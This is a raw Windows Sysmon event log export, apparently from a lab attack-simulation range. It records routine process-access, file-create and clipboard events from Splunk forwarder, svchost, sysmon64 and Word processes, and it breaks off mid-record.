19:19:04.140{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C378FC0C3E40A686B68BAF0EE6B724C1,SHA256=7D73DC2EFD0E98ACCEE97EE7C4A10C437711C8EFC6BFDC6775B8B5DC0F23B917falsefalse - insufficient disk space 354300x80000000000000001095366Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:59.609{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1166-false10.0.1.12-8000- 10341000x80000000000000001095365Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:04.534{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095364Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:04.534{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095363Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:04.055{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F51CE969966F98ED6F5EC94F87595D8,SHA256=48941A87E7F4B81D618ABBB0F38D16A9B6F4AD3E76AF15D39B6BE8AED021F743,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606679Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:05.276{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606678Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:05.275{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAC4913963BA3E9037DA1B14841D3074,SHA256=2BF3737446290E03DAD8F4711EEB84A3B316E0415C392EA19E54DAFF6B46430Cfalsefalse - insufficient disk space 10341000x80000000000000001095372Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.836{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-818C-607D-1500-00000000BA01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095371Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.835{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-818C-607D-1500-00000000BA01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095370Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.835{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-818C-607D-1500-00000000BA01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095369Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.535{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095368Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.535{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095367Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:05.063{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A07FA38B61BE02F2621C3539DCC21C7,SHA256=E6F0D19155D9A9BA885B429F1F32256F9EC3B993BE017FBEB4818A8CC60A4751,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606687Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.430{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606686Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.430{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1A1BC1C6C8465E98FC0B8F61F8F7BB,SHA256=4097BAC29774A0A4987F1A6B5784FC958148F741F858BF5597DBE3579706586Ffalsefalse - insufficient disk space 23542300x80000000000000001095374Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:06.568{761B69BB-A4A5-607D-9A08-00000000BA01}6816ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wcognp7t.default-release\datareporting\aborted-session-pingMD5=273E60B225465DEC1732BD148A87845F,SHA256=2B359AFA292DF6193DD6055FBDD8F27BE2CA17822F2365EE92E5F3E05617C952,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095373Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:06.072{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D8FB2C4A520E6D8160DF5B966F22DA2,SHA256=D0CD4261BDA3D87DD2BE8720B46A12D7650EE3DC172A0B62EEEAEF29FBEDB474,IMPHASH=00000000000000000000000000000000falsetrue 24542400x80000000000000001606685Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.282{21761711-84C8-607D-EA00-00000000BB01}3720C:\Windows\System32\rdpclip.exe2user: WIN-HOST-5\Administrator hostname: mj0b0drgMD5=9950A34F241270B2AF33BAF78182DDFA,SHA256=1F5296A83A5D1C210C3E8E57AFE1D1EEABB8BBB07030740946BB525ECBD725E9true 10341000x80000000000000001606684Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.282{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1D00-00000000BB01}1960C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606683Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.282{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1D00-00000000BB01}1960C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606682Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.282{21761711-83AE-607D-1D00-00000000BB01}1960C:\Windows\sysmon64.exeC:\Sysmon\CLIP-9950A34F241270B2AF33BAF78182DDFA1F5296A83A5D1C210C3E8E57AFE1D1EEABB8BBB07030740946BB525ECBD725E92021-04-21 19:19:06.282 10341000x80000000000000001606681Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.282{21761711-83AE-607D-1D00-00000000BB01}19603936C:\Windows\sysmon64.exe{21761711-84C8-607D-EA00-00000000BB01}3720C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Windows\sysmon64.exe+50e63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606680Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.260{21761711-65C9-6080-565E-00000000BB01}33483628C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{21761711-84C8-607D-EA00-00000000BB01}3720C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdd53|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdcf3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc66|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd60d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\Root\Office16\wwlib.dll+3b117|C:\Program Files\Microsoft Office\Root\Office16\wwlib.dll+1f2312|C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE+1143|C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE+1492|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606690Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:07.701{21761711-65C9-6080-565E-00000000BB01}33483628C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{21761711-84C8-607D-EA00-00000000BB01}3720C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdd53|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdcf3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc66|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd60d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\Root\Office16\wwlib.dll+3b117|C:\Program Files\Microsoft Office\Root\Office16\wwlib.dll+1f2312|C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE+1143|C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE+1492|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606689Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:07.448{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606688Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:07.448{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E10C94DFBA78AB6098076CC016CBBFE,SHA256=B718E98833C70E7B2720A2F7BFD89D7D5E61510B96C273632D87F6C5CA1D9E95falsefalse - insufficient disk space 10341000x80000000000000001095385Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.477{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095384Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.477{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095383Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.096{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B78862FFC57786B07C0CB60437C8C0D6,SHA256=3871497BBA304D7D4CF3CCBDA199DC1E14AC8DBB0E531908172D6B53F52E6483,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095382Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.060{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AAB-6080-9B5F-00000000BA01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095381Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.058{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095380Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.058{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095379Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.058{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095378Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.058{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095377Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.058{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-7AAB-6080-9B5F-00000000BA01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095376Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.057{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AAB-6080-9B5F-00000000BA01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 